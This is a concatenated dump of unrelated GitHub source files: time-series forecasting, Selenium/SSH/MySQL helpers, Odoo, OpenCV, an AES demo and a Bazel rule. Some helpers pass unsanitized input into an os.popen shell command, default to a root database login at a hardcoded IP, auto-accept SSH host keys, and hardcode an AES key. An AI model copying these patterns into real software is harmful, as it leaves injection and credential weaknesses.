maximum order of autoregressive model\n q (int): maximum order of moving average model\n\n Returns:\n phis (ndarray (p,)): coefficients for AR(p)\n thetas (ndarray (q,)): coefficients for MA(q)\n mu (float): mean of error\n std (float): std of error\n \"\"\"\n def f(x):\n return -1*arma_likelihood(file, phis=x[:p], thetas=x[p:p+q], mu=x[-2], std=x[-1])\n \n # Initialize\n time_series = np.load(file)\n \n # Find parameters\n x0 = np.zeros(p+q+2)\n x0[-2] = time_series.mean()\n x0[-1] = time_series.std()\n sol = minimize(f,x0,method=\"SLSQP\")\n sol = sol['x']\n \n phi = sol[:p]\n theta = sol[p:p+q]\n mu = sol[-2]\n std = sol[-1]\n\n return (np.array(phi), np.array(theta), mu, std)\n\ndef arma_forecast(file='weather.npy', phis=np.array([0]), thetas=np.array([0]), mu=0., std=0., n=30):\n \"\"\"\n Forecast future observations of data.\n \n Parameters:\n file (str): data file\n phis (ndarray (p,)): coefficients of AR(p)\n thetas (ndarray (q,)): coefficients of MA(q)\n mu (float): mean of ARMA model\n std (float): standard deviation of ARMA model\n n (int): number of forecast observations\n\n Returns:\n new_mus (ndarray (n,)): future means\n new_covs (ndarray (n,)): future standard deviations\n \"\"\"\n data = np.load(file)\n z = np.diff(data)\n n = len(z)\n N = len(z) - 1\n F,Q,H = state_space_rep(phis, thetas, mu, std)[:3]\n mus, covs = kalman(F,Q,H,z-mu)\n \n X0 = mus[-1]\n P0 = covs[-1]\n \n # Perform the update once\n y = z[-1] - H@X0\n S = H@P0@H.T\n K = P0@H.T@la.inv(S)\n X0 = X0 + K@y\n P0 = (np.eye(len(K@H)) - K@H) @ P0\n \n new_mus = [F@X0]\n new_covs = [F@P0@F.T + Q]\n \n for i in range(1,n):\n new_mus.append(F@new_mus[i-1])\n new_covs.append(F@new_covs[i-1]@F.T + Q)\n \n obs = []\n for i in range(len(new_mus)):\n obs.append(H@new_mus[i] + mu)\n \n # Plot the differences with predicted data\n std = np.einsum(\"so,noO,SO->nsS\",H,covs,H).ravel()[-1]\n plt.plot(np.linspace(0,N+1,N+1), z[:N+1], label='Old Data')\n plt.plot(np.linspace(N+2,N+len(obs)+1,len(obs)),obs, '--', label='Forecast')\n plt.plot(np.linspace(N+2,N+len(obs)+1,len(obs)),obs + std, '--', c='green', label='$95%$ CI')\n plt.plot(np.linspace(N+2,N+len(obs)+1,len(obs)),obs - std, '--', c='green', label='$95%$ CI')\n plt.legend(['Old Data', 'Forecast', '$95\\%$ Confidence Interval'])\n plt.title('ARMA Forecast')\n plt.xlabel('Days')\n plt.ylabel('Change in Temperature $(C) - \\mu = 0$')\n plt.show()\n \n return (np.array(new_mus), np.array(new_mus))\n \n\n#### Implement ARMA using the statsmodels package ####\n\ndef sm_arma(file ='weather.npy', p=4, q=4, n=30):\n \"\"\"\n Build an ARMA model with statsmodel and \n predict future n values.\n\n Parameters:\n file (str): data file\n p (int): maximum order of autoregressive model\n q (int): maximum order of moving average model\n n (int): number of values to predict\n\n Return:\n aic (float): aic of optimal model\n \"\"\"\n data = np.load(file)\n z = np.diff(data)\n N = len(z) - 1\n \n best_aic = np.inf\n \n # Find best model that minimizes AIC\n for i in range(1,p+1):\n for j in range(1,q+1):\n model = ARIMA(z, order=(i,0,j), trend='c').fit(method='innovations_mle')\n \n if model.aic < best_aic:\n best_aic = model.aic\n best_model = model\n\n \n new_vals = best_model.predict(start=0, end=len(data)+n)\n \n # Plot\n plt.plot(np.linspace(0,N+1,N+1), z[:N+1], label='Old Data')\n plt.plot(np.linspace(0,len(new_vals),len(new_vals)), new_vals, label='ARIMA Model')\n plt.title('Statsmodel ARIMA Forecast')\n plt.xlabel('Days')\n plt.ylabel('Change in Temperature $(C) - \\mu = 0$')\n plt.legend()\n plt.show()\n \n return best_aic\n \n \ndef sm_varma(start = '1959-09-30', end = '2012-09-30'):\n \"\"\"\n Build an ARMA model with statsmodel and\n predict future n values.\n\n Parameters:\n start (str): the data at which to begin forecasting\n end (str): the date at which to stop forecasting\n\n Return:\n aic (float): aic of optimal model\n \"\"\"\n # Load in data\n df = sm.datasets.macrodata.load_pandas().data\n # Create DateTimeIndex\n dates = df[['year', 'quarter']].astype(int).astype(str)\n dates = dates[\"year\"] + \"Q\" + dates[\"quarter\"]\n dates = dates_from_str(dates)\n df.index = pd.DatetimeIndex(dates)\n # Select columns used in prediction\n df = df[['realgdp','realcons','realinv']]\n \n model = VARMAX(df[['realgdp', 'realcons', 'realinv']])\n model = model.fit(maxiter=1000, disp=False, ic='aic')\n predict = model.predict(start, end)\n \n # Get CI\n forecast_obj = model.get_forecast(end)\n all_CI = forecast_obj.conf_int(alpha=0.05)\n \n # Plot\n fig, ax = plt.subplots(3,1, figsize=(10,9))\n # Plot realgdp\n ax[0].plot(df['realgdp'])\n ax[0].plot(predict['realgdp'])\n ax[0].plot(all_CI['upper realgdp'], '--', c='green')\n ax[0].plot(all_CI['lower realgdp'], '--', c='green')\n ax[0].legend(['realgdp', 'Forecast', '$95\\%$ Confidence Interval'])\n\n # Plot realcons\n ax[1].plot(df['realcons'])\n ax[1].plot(predict['realcons'])\n ax[1].plot(all_CI['upper realcons'], '--', c='green')\n ax[1].plot(all_CI['lower realcons'], '--', c='green')\n ax[1].legend(['realcons', 'Forecast', '$95\\%$ Confidence Interval'])\n\n \n # Plot realinv\n ax[2].plot(df['realinv'])\n ax[2].plot(predict['realinv'])\n ax[2].plot(all_CI['upper realinv'], '--', c='green')\n ax[2].plot(all_CI['lower realinv'], '--', c='green')\n ax[2].legend(['realinv', 'Forecast', '$95\\%$ Confidence Interval'])\n\n \n \n plt.show()\n \n return model.aic\n \n############################### Helper Functions ###############################\n \ndef kalman(F, Q, H, time_series):\n # Get dimensions\n dim_states = F.shape[0]\n\n # Initialize variables\n # covs[i] = P_{i | i-1}\n covs = np.zeros((len(time_series), dim_states, dim_states))\n mus = np.zeros((len(time_series), dim_states))\n\n # Solve of for first mu and cov\n covs[0] = np.linalg.solve(np.eye(dim_states**2) - np.kron(F,F),np.eye(dim_states**2)).dot(Q.flatten()).reshape(\n (dim_states,dim_states))\n mus[0] = np.zeros((dim_states,))\n\n # Update Kalman Filter\n for i in range(1, len(time_series)):\n t1 = np.linalg.solve(H.dot(covs[i-1]).dot(H.T),np.eye(H.shape[0]))\n t2 = covs[i-1].dot(H.T.dot(t1.dot(H.dot(covs[i-1]))))\n covs[i] = F.dot((covs[i-1] - t2).dot(F.T)) + Q\n mus[i] = F.dot(mus[i-1]) + F.dot(covs[i-1].dot(H.T.dot(t1))).dot(\n time_series[i-1] - H.dot(mus[i-1]))\n return mus, covs\n\ndef state_space_rep(phis, thetas, mu, sigma):\n # Initialize variables\n dim_states = max(len(phis), len(thetas)+1)\n dim_time_series = 1 #hardcoded for 1d time_series\n\n F = np.zeros((dim_states,dim_states))\n Q = np.zeros((dim_states, dim_states))\n H = np.zeros((dim_time_series, dim_states))\n\n # Create F\n F[0][:len(phis)] = phis\n F[1:,:-1] = np.eye(dim_states - 1)\n # Create Q\n Q[0][0] = sigma**2\n # Create H\n H[0][0] = 1.\n H[0][1:len(thetas)+1] = thetas\n\n return F, Q, H, dim_states, dim_time_series\n\n\n\n","repo_name":"quindaly/ARMA","sub_path":"arma_model.py","file_name":"arma_model.py","file_ext":"py","file_size_in_byte":10470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5874369984","text":"\"\"\"\n根据tool 封装常用方法\n\"\"\"\nimport pymysql, pyperclip, os, paramiko\nimport pyzbar.pyzbar as pyzbar\nfrom PIL import Image\n\n\n\nclass SumOperate:\n \"\"\" 其他 常用 非 selenium 类方法 \"\"\"\n \n @staticmethod\n def get_2fa(code : str):\n \"\"\" 执行2fa 获取 验证码\"\"\"\n result = os.popen(f'kmg 2fa {code}').read()\n return result\n\n @staticmethod\n def mysql_opreate(ip:str=\"139.224.239.215\", user:str=\"root\", pw:str=None, dbname:str=None, sql:str=None):\n db = pymysql.connect(host=ip, user=user, password=pw, database=dbname)\n\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n db.close()\n return data\n\n \n\n @staticmethod\n def get_img_info(path:str):\n \"\"\"\n 识别二维码\n \"\"\"\n img = Image.open(path)\n img.show()\n barcodes = pyzbar.decode(img)\n for x in barcodes:\n return x.data.decode(\"utf-8\")\n\n @staticmethod\n def get_clip_text():\n print(pyperclip.paste())\n return pyperclip.paste()\n\n @staticmethod\n def ssh_server(ip, port, username, pw ,cmd):\n \"\"\"远程连接 服务器, 执行相关命令 \"\"\"\n # 生成SSH客户端\n s = paramiko.SSHClient()\n s.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n s.connect(ip, port, username, password=pw)\n stdin,stdout,stderr = s.exec_command(cmd)\n p = stdout.read()\n s.close()\n return p\n \n \n\n @staticmethod\n def logmsg(msg: str):\n \"\"\"\n 对rais msg 进行处理后存入log 中\n \"\"\"\n txt = msg.split(r'> File', 1)\n return txt[-1]\n\n\n","repo_name":"boziyoung/selenium","sub_path":"common/operate.py","file_name":"operate.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40411610859","text":"from odoo import fields, models\n\n\nclass StockBackorderConfirmation(models.TransientModel):\n _inherit = \"stock.backorder.confirmation\"\n\n def compute_carrier_id(self):\n records=self.env['stock.picking'].browse(self.env.context.get('active_ids'))\n for i in records:\n if i.carrier_id:\n return i.carrier_id.id\n\n return False\n\n carrier_id = fields.Many2one('delivery.carrier', 'Carrier', default=compute_carrier_id)\n \n def process(self):\n if self.carrier_id:\n self.pick_ids.write({\"carrier_id\": self.carrier_id.id})\n super().process()\n attachment_ids = self.env['ir.attachment'].search(\n [('res_id', 'in', self.pick_ids.ids), ('res_model', '=', 'stock.picking')])\n\n return attachment_ids.action_download_attachment()","repo_name":"Leozzin/addons_alfa","sub_path":"de_alfa_get_carrier_wizard/wizard/stock_backorder_confirmation.py","file_name":"stock_backorder_confirmation.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36076767250","text":"from collections import deque\n\nn = int(input())\nindegree = [0] * (n+1)\ngraph = [[] for _ in range(n+1)]\ncost = [0] * (n+1)\n\n\n# 소요시간, \nfor j in range(1, n+1):\n inp = list(map(int, input().split()))\n for i in range(len(inp)): \n if i == 0: # j과목의 소요시간\n cost[j] = inp[i]\n elif inp[i] != -1: # j과목의 선수과목\n prior = inp[i]\n graph[prior].append(j)\n indegree[j] += 1\n# 동시에 여러 강의 수강 가능 \n# n까지의 최소시간 어떻게 계산?\n# 같은 length로 들어간 큐에서, 최소시간만 고려한다.\n\n# 위상 정렬 함수\ndef topology_sort():\n time = [c for c in cost] # 시간 후보 넣는 리스트\n q = deque()\n\n # 첫시작 : 선수과목 (indegree) 가 0인 노드 삽입\n for i in range(1, n+1):\n if indegree[i] == 0:\n q.append(i)\n\n # 큐가 빌때까지 반복\n while q:\n now = q.popleft()\n # result.append(now)\n # 현재 노드 소요시간 갱신\n # cost[now] += max(time[now])\n # 연결 노드 진입차수에서 1 빼기\n for i in graph[now]:\n indegree[i] -= 1\n # 연결 노드의 시간 리스트에 추가\n # time[i].append(cost[now])\n time[i] = max(time[i], cost[i]+time[now])\n # 새롭게 0이 되는 노드를 큐에 삽입\n if indegree[i] == 0:\n q.append(i)\n\n for t in time[1:]:\n print(t)\n\ntopology_sort()\n\n\n\n\n \n\n \n\n","repo_name":"hoeen/coding_test_training","sub_path":"solution_codes/bookcodingtest_그래프_커리큘럼_1회.py","file_name":"bookcodingtest_그래프_커리큘럼_1회.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"ko","doc_type":"code","stars":10,"dataset":"github-code","pt":"69"}
+{"seq_id":"9935304281","text":"from sys import platform\nimport re\n\n\nclass OutilsControleurs:\n \"\"\"\n Classe regroupant divers methodes servant dans l'ensemble du programme.\n \"\"\"\n\n def test_date(date):\n \"\"\"\n Methode servant à controler le format d'une date.\n type d'arguments : str\n return : 0, 1, 3 si erreur, et 2 si valeur correct\n rtype : int\n \"\"\"\n if len(date) > 10:\n return 0\n if len(date) < 10:\n return 1\n test_date = re.match(r'[0-3][0-9]/[0-1][0-9]/[0-9][0-9][0-9][0-9]', date)\n if test_date:\n return 2\n else:\n return 3\n\n def which_os():\n \"\"\"\n Methode qui test l'os de l'ordinateur puis retourne la bonne syntaxe.\n return : syntaxe correcte pour effacer la console\n rtype : str\n \"\"\"\n if platform == \"linux\" or platform == \"linux2\":\n return '\"cls\"'\n elif platform == \"darwin\":\n return '\"clear\"'\n elif platform == \"win32\":\n return '\"cls\"'\n\n def test_heure(heure):\n \"\"\"\n Methode servant à controler le format d'une heure.\n type d'arguments : str\n return : 0, 1, 3 si erreur, et 2 si valeur correct\n rtype : int\n \"\"\"\n if len(heure) > 5:\n return 0\n if len(heure) < 5:\n return 1\n test_heure = re.match(r'[0-2][0-9]:[0-5][0-9]', heure)\n if test_heure:\n return 2\n else:\n return 3\n","repo_name":"ChevallierQ/P4_01_tournois_echecs_fini","sub_path":"controleurs/outils_controleurs.py","file_name":"outils_controleurs.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10276471653","text":"'''\r\n#------------------------------------------------------------------------\r\n#\r\n# This is a python Example code for EncroPi Board\r\n# Written by SB Components Ltd \r\n#\r\n#==================================================================================\r\n# Copyright (c) SB Components Ltd\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy \r\n# of this software and associated documentation files (the \"Software\"), to deal \r\n# in the Software without restriction, including without limitation the rights \r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell \r\n# copies of the Software, and to permit persons to whom the Software is \r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all \r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR \r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE \r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER \r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, \r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE \r\n# SOFTWARE.\r\n#==================================================================================\r\n'''\r\n\r\nfrom machine import Pin, SPI ,UART\r\nfrom ucryptolib import aes\r\nimport random\r\nimport time\r\nimport EncroPi\r\nimport uos\r\nimport os\r\nimport st7789\r\nimport vga1_bold_16x32 as font\r\n\r\nMODE_CBC = 2\r\nBLOCK_SIZE = 16\r\n\r\nsd=EncroPi.SDCard()\r\nspi = SPI(1, baudrate=40000000, sck=Pin(10), mosi=Pin(11))\r\ntft = st7789.ST7789(spi,135,240,reset=Pin(12, Pin.OUT),cs=Pin(9, Pin.OUT),dc=Pin(8, Pin.OUT),backlight=Pin(13, Pin.OUT),rotation=1)\r\n\r\ndef info():\r\n tft.init()\r\n time.sleep(0.2)\r\n tft.text(font,\"SB COMPONENTS\", 15,20)\r\n tft.fill_rect(15, 60, 210,10, st7789.RED)\r\n \r\n tft.text(font,\"EncroPi\", 15,80,st7789.YELLOW)\r\n #tft.text(font,\"CHECK\", 15,100,st7789.YELLOW)\r\n tft.fill_rect(15, 140, 210, 10, st7789.BLUE)\r\n time.sleep(2)\r\n tft.fill(0) #clear screen\r\n \r\ninfo()\r\n\r\nkey = b'this_is_the_key_123456_asdfgh123'\r\n\r\nplaintext = 'SB COMPONENTS'\r\n\r\nprint('Plain Text:', plaintext)\r\ntft.text(font,\"Plain Text:\", 15,20,st7789.YELLOW)\r\ntft.text(font,plaintext, 15,80,st7789.YELLOW)\r\ntime.sleep(2)\r\ntft.fill(0)\r\n# Padding plain text with space \r\npad = BLOCK_SIZE - len(plaintext) % BLOCK_SIZE\r\nplaintext = plaintext + \" \"*pad\r\n\r\niv = uos.urandom(BLOCK_SIZE)\r\ncipher = aes(key,MODE_CBC,iv)\r\n \r\nct_bytes = iv + cipher.encrypt(plaintext)\r\nprint ('AES-CBC encrypted:', ct_bytes)\r\ntft.text(font,'Encrypted:', 15,20,st7789.YELLOW)\r\ntft.text(font,ct_bytes, 15,80,st7789.YELLOW)\r\ntime.sleep(2)\r\ntft.fill(0)\r\n\r\n\r\nvfs = os.VfsFat(sd)\r\nos.mount(vfs, \"/fc\")\r\nprint(\"Filesystem check\")\r\nprint(os.listdir(\"/fc\"))\r\n\r\nfn = \"/fc/Encripted.bin\" # make encripted file\r\n\r\n\r\nprint()\r\nprint(\"Single block read/write\")\r\nwith open(fn, \"ab\") as f:\r\n n = f.write(ct_bytes)\r\n print(n, \"bytes written\") \r\n\r\nwith open(fn, \"rb\") as f:\r\n result2 = f.read()\r\n print(result2)\r\n print(len(result2), \"bytes read\")\r\n\r\nprint(result2)\r\niv = result2[:BLOCK_SIZE]\r\ncipher = aes(key,MODE_CBC,iv)\r\ndecrypted = cipher.decrypt(result2)[BLOCK_SIZE:]\r\nprint('AES-CBC decrypted:', decrypted)\r\ntft.text(font,'Decrypted', 15,20,st7789.YELLOW)\r\ntft.text(font,decrypted, 15,80,st7789.YELLOW)\r\ntime.sleep(2)\r\n#tft.fill(0)\r\nos.umount(\"/fc\")\r\n","repo_name":"sbcshop/EncroPi-Software","sub_path":"Encryption/encryption_sdcard.py","file_name":"encryption_sdcard.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"69"}
+{"seq_id":"39916890194","text":"\"\"\"\nGhost's age\n\"\"\"\n\ndef fib(n):\n if n < 2:\n return n\n return fib(n-2) + fib(n-1)\n\ndef make_transperency_table(max_transperency, max_age):\n FIBONACCI = list(map(fib, range(0, 21)))\n previous_transperency = max_transperency\n transperency_table = {}\n for age in range(max_age):\n if age in FIBONACCI:\n transperency = previous_transperency - age\n else:\n transperency = previous_transperency + 1\n transperency_table[transperency] = age\n previous_transperency = transperency\n return transperency_table\n\nmax_age = 5000\nmax_transperency = 10000\ncurrent_transperency = 9998\ntransperency_table = make_transperency_table(max_transperency, max_age)\n\ntry:\n print(f'current age for {current_transperency} transperency is {transperency_table[current_transperency]}')\nexcept KeyError as e:\n print('Such value does not exist for transperency.')\n","repo_name":"gidmaster/python_courses","sub_path":"Lesson 08/Task_865.py","file_name":"Task_865.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"3583918378","text":"from __future__ import unicode_literals\nfrom django.utils.six import python_2_unicode_compatible\n\nimport Choices\nfrom django.db import models\n\n\n# Create your models here.\n\n@python_2_unicode_compatible\nclass Exploit(models.Model):\n isVerified = models.BooleanField(default=False)\n type = models.IntegerField(choices=Choices.TYPE_CHOICES, default=1)\n platform = models.IntegerField(choices=Choices.PLATFORM_CHOICES, default=1)\n author = models.CharField(max_length=100)\n cve = models.CharField(max_length=30, default=\"N/A\")\n app_link = models.URLField()\n title = models.CharField(max_length=200,default=\"\")\n exploit = models.TextField()\n published = models.DateField()\n\n def __str__(self):\n return self.title\n","repo_name":"n1arash/SploitDB","sub_path":"exploit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31622200057","text":"import cv2\nimport numpy as np\nfrom skimage import exposure, img_as_float, img_as_ubyte\n\nclass recongize_circle():\n def __init__(self, garyimg):\n self.img = np.array(garyimg)\n self.circle = None\n self.type = self.img.dtype\n def train(self):\n # self.img = self.img / 256\n self.img = img_as_float(self.img)\n self.img = exposure.rescale_intensity(self.img)\n self.img = self.img * 256\n while exposure.is_low_contrast(self.img):\n self.img = exposure.adjust_gamma(self.img, 0.8)\n self.img = self.img.astype(np.uint8)\n self.img = img_as_ubyte(self.img)\n '''cv2 median filter-->>Reduce Noise'''\n '''Optional:cv2 gaussian filter-->>cv2.GaussianBlur'''\n self.img = cv2.medianBlur(self.img, 3)\n '''cv2 threshold-->>gain contrast'''\n '''Optional:cv2.adaptiveThreshold-->>have no good result'''\n ret, self.img = cv2.threshold(self.img, 50, 255, cv2.THRESH_BINARY)\n\n def search(self):\n '''\n Hough Circles recognize sample cell\n '''\n self.circles1 = cv2.HoughCircles(self.img, cv2.HOUGH_GRADIENT, 2, 100, param1=100, param2=25, minRadius=230,\n maxRadius=280)\n\n def output(self):\n '''\n Exception Handling\n hough circles NOT identify circles\n Exception:\n TypeError\n '''\n try:\n circles = self.circles1[0, :, :]\n except TypeError:\n pass\n print('no circles')\n else:\n circles = np.uint16(np.around(circles))\n temp = circles\n if np.shape(temp)[0] == 1:\n self.circle = temp[0]\n else:\n countarray = []\n for i in temp:\n sumarray = []\n x = i[0]\n y = i[1]\n r = i[2]\n for yi, xline in enumerate(self.img):\n for xi, value in enumerate(xline):\n left = ((x - xi) ** 2 + (y - yi) ** 2)\n right = r ** 2\n if left <= right:\n sumarray.append(value)\n sumarray = np.array(sumarray)\n sum = np.mean(sumarray)\n countarray.append(sum)\n countarray = np.array(countarray)\n index = np.where(countarray == np.min(countarray))\n self.circle = temp[index[0][0]]\n return self.circle\n\n def train_search_output(self):\n self.train(), self.search(), self.output()\n\n def draw_all(self,color_img):\n if np.array(color_img).dtype == 'float32':\n color_img = color_img*256\n if np.array(color_img).dtype == 'uint16':\n color_img = color_img/256\n color_img = color_img.astype(np.uint8)\n for circle in self.circles1[0, :, :]:\n cv2.circle(color_img, (circle[0], circle[1]), circle[2], (0, 255, 0), 5)\n cv2.circle(color_img, (circle[0], circle[1]), 150, (0, 0, 255), 5)\n cv2.circle(color_img, (circle[0], circle[1]), 6, (255, 0, 0), -1)\n return color_img\n\n def draw(self,color_img):\n if np.array(color_img).dtype == 'float32':\n color_img = color_img*256\n if np.array(color_img).dtype == 'uint16':\n color_img = color_img/256\n color_img = color_img.astype(np.uint8)\n cv2.circle(color_img, (self.circle[0], self.circle[1]), self.circle[2], (0, 255, 0), 5)\n cv2.circle(color_img, (self.circle[0], self.circle[1]), 150, (0, 0, 255), 5)\n cv2.circle(color_img, (self.circle[0], self.circle[1]), 6, (255, 0, 0), -1)\n return color_img\n\nclass recongize_linesP():\n def __init__(self, cannyimg):\n self.img = np.array(cannyimg)\n self.line = None\n self.type = self.img.dtype\n\n def train(self):\n # self.img = self.img / 256\n self.img = img_as_float(self.img)\n self.img = exposure.rescale_intensity(self.img)\n self.img = self.img * 256\n while exposure.is_low_contrast(self.img):\n self.img = exposure.adjust_gamma(self.img, 0.8)\n self.img = self.img.astype(np.uint8)\n # self.img = img_as_ubyte(self.img)\n '''cv2 median filter-->>Reduce Noise'''\n '''Optional:cv2 gaussian filter-->>cv2.GaussianBlur'''\n # self.img = cv2.medianBlur(self.img, 3)\n self.img = cv2.GaussianBlur(self.img, (5, 5), 0)\n # self.img = cv2.fastNlMeansDenoising(self.img,h=3,templateWindowSize=7,searchWindowSize=21)\n '''cv2 threshold-->>gain contrast'''\n '''Optional:cv2.adaptiveThreshold-->>have no good result'''\n ret, self.img = cv2.threshold(self.img, 40, 255, cv2.THRESH_BINARY)\n '''cv2 canny-->>find high contrast area'''\n self.img = cv2.Canny(self.img, 90, 25)\n\n def search(self):\n '''cv2 HoughLinesP-->>find lines'''\n self.lines1 = cv2.HoughLinesP(self.img, 1, np.pi / 360, 50, minLineLength=100, maxLineGap=30)\n\n def Linear_X(self, y, b, k):\n x = (y - b) / k\n return int(x)\n\n def output(self, top_point=175, bot_point=675, L_offset=-135, R_offset=-35):\n rectangle_point = []\n try:\n len(self.lines1)\n except TypeError:\n print('no lines')\n else:\n for i in self.lines1:\n for x1, y1, x2, y2 in i:\n if abs((y1 - y2) / (x1 - x2 + 1E-04)) > 7:\n K = (y1 - y2) / (x1 - x2 + 1E-04)\n if K < 0:\n B = (x2 * y1 - y2 * x1) / (x2 - x1 + 1E-04)\n X = self.Linear_X(0, B, K)\n\n rectangle_point.append([B, K, x1, x2, y1, y2, X])\n rectangle_point = np.array(rectangle_point)\n try:\n rectangle_point_index = np.where(rectangle_point == np.min(rectangle_point[:, 6]))\n except IndexError:\n rectangle_point = [10000, -40]\n else:\n rectangle_point = rectangle_point[rectangle_point_index[0][0]]\n self._B = int(rectangle_point[0])\n self._K = int(rectangle_point[1])\n self.xmin = (self.Linear_X(bot_point, self._B, K)) + L_offset\n self.ymin = bot_point\n self.xmax = (self.Linear_X(top_point, self._B, K)) + R_offset\n self.ymax = top_point\n return self.xmin, self.ymin, self.xmax, self.ymax\n\n def draw(self, color_img, color_array=(255, 255, 0), line_weight=5, top_point=175, bot_point=675, L_offset=-135,\n R_offset=-35):\n if np.array(color_img).dtype == 'float32':\n color_img = color_img*256\n if np.array(color_img).dtype == 'uint16':\n color_img = color_img/256\n color_img = color_img.astype(np.uint8)\n for i in self.lines1:\n for x1, y1, x2, y2 in i:\n if abs((y1 - y2) / (x1 - x2 + 1E-04)) > 7:\n cv2.line(color_img, (x1, y1), (x2, y2), (0, 255, 255), 5)\n '''draw parallelogram'''\n cv2.line(color_img,\n ((self.Linear_X(top_point, self._B, self._K) + L_offset), top_point),\n ((self.Linear_X(bot_point, self._B, self._K) + L_offset), bot_point),\n color_array, line_weight)\n cv2.line(color_img,\n ((self.Linear_X(top_point, self._B, self._K) + R_offset), top_point),\n ((self.Linear_X(bot_point, self._B, self._K) + R_offset), bot_point),\n color_array, line_weight)\n cv2.line(color_img,\n ((self.Linear_X(top_point, self._B, self._K) + L_offset), top_point),\n ((self.Linear_X(top_point, self._B, self._K) + R_offset), top_point),\n color_array, line_weight)\n cv2.line(color_img,\n ((self.Linear_X(bot_point, self._B, self._K) + L_offset), bot_point),\n ((self.Linear_X(bot_point, self._B, self._K) + R_offset), bot_point),\n color_array, line_weight)\n return color_img\n\n def train_search_output(self):\n self.train(), self.search(), self.output()\n","repo_name":"VHsCHs/PyHyperspectral","sub_path":"models/cv_circles_linesP.py","file_name":"cv_circles_linesP.py","file_ext":"py","file_size_in_byte":8227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"6297894548","text":"load(\"@io_bazel_rules_go//go:def.bzl\", \"go_binary\", \"go_context\", \"go_rule\")\nload(\"@io_bazel_rules_go//go/private:providers.bzl\", \"GoLibrary\")\n\n_MOCKGEN_TOOL = \"@com_github_golang_mock//mockgen\"\n_MOCKGEN_MODEL_LIB = \"@com_github_golang_mock//mockgen/model:go_default_library\"\n\ndef _gomock_source_impl(ctx):\n args = [\"-source\", ctx.file.source.path]\n if ctx.attr.package != \"\":\n args += [\"-package\", ctx.attr.package]\n args += [\",\".join(ctx.attr.interfaces)]\n\n out = ctx.outputs.out\n cmd = ctx.file.mockgen_tool\n go_ctx = go_context(ctx)\n inputs = go_ctx.sdk.headers + go_ctx.sdk.srcs + go_ctx.sdk.tools + [ctx.file.source]\n\n # We can use the go binary from the stdlib for most of the environment\n # variables, but our GOPATH is specific to the library target we were given.\n ctx.actions.run_shell(\n outputs = [out],\n inputs = inputs,\n tools = [\n cmd,\n go_ctx.go,\n ],\n command = \"\"\"\n source <($PWD/{godir}/go env) &&\n export PATH=$GOROOT/bin:$PWD/{godir}:$PATH &&\n {cmd} {args} > {out}\n \"\"\".format(\n godir = go_ctx.go.path[:-1 - len(go_ctx.go.basename)],\n cmd = \"$(pwd)/\" + cmd.path,\n args = \" \".join(args),\n out = out.path,\n ),\n )\n\n_gomock_source = go_rule(\n _gomock_source_impl,\n attrs = {\n \"library\": attr.label(\n doc = \"The target the Go library is at to look for the interfaces in. When this is set and source is not set, mockgen will use its reflect code to generate the mocks. If source is set, its dependencies will be included in the GOPATH that mockgen will be run in.\",\n providers = [GoLibrary],\n mandatory = True,\n ),\n \"source\": attr.label(\n doc = \"A Go source file to find all the interfaces to generate mocks for. See also the docs for library.\",\n mandatory = False,\n allow_single_file = True,\n ),\n \"out\": attr.output(\n doc = \"The new Go file to emit the generated mocks into\",\n mandatory = True,\n ),\n \"interfaces\": attr.string_list(\n allow_empty = False,\n doc = \"The names of the Go interfaces to generate mocks for. If not set, all of the interfaces in the library or source file will have mocks generated for them.\",\n mandatory = True,\n ),\n \"package\": attr.string(\n doc = \"The name of the package the generated mocks should be in. If not specified, uses mockgen's default.\",\n ),\n \"self_package\": attr.string(\n doc = \"The full package import path for the generated code. The purpose of this flag is to prevent import cycles in the generated code by trying to include its own package. This can happen if the mock's package is set to one of its inputs (usually the main one) and the output is stdio so mockgen cannot detect the final output package. Setting this flag will then tell mockgen which import to exclude.\",\n ),\n \"mockgen_tool\": attr.label(\n doc = \"The mockgen tool to run\",\n default = Label(_MOCKGEN_TOOL),\n allow_single_file = True,\n executable = True,\n cfg = \"host\",\n mandatory = False,\n ),\n },\n)\n\ndef gomock(name, library, out, **kwargs):\n mockgen_tool = _MOCKGEN_TOOL\n if kwargs.get(\"mockgen_tool\", None):\n mockgen_tool = kwargs[\"mockgen_tool\"]\n\n if kwargs.get(\"source\", None):\n _gomock_source(\n name = name,\n library = library,\n out = out,\n **kwargs\n )\n else:\n _gomock_reflect(\n name = name,\n library = library,\n out = out,\n mockgen_tool = mockgen_tool,\n **kwargs\n )\n\ndef _gomock_reflect(name, library, out, mockgen_tool, 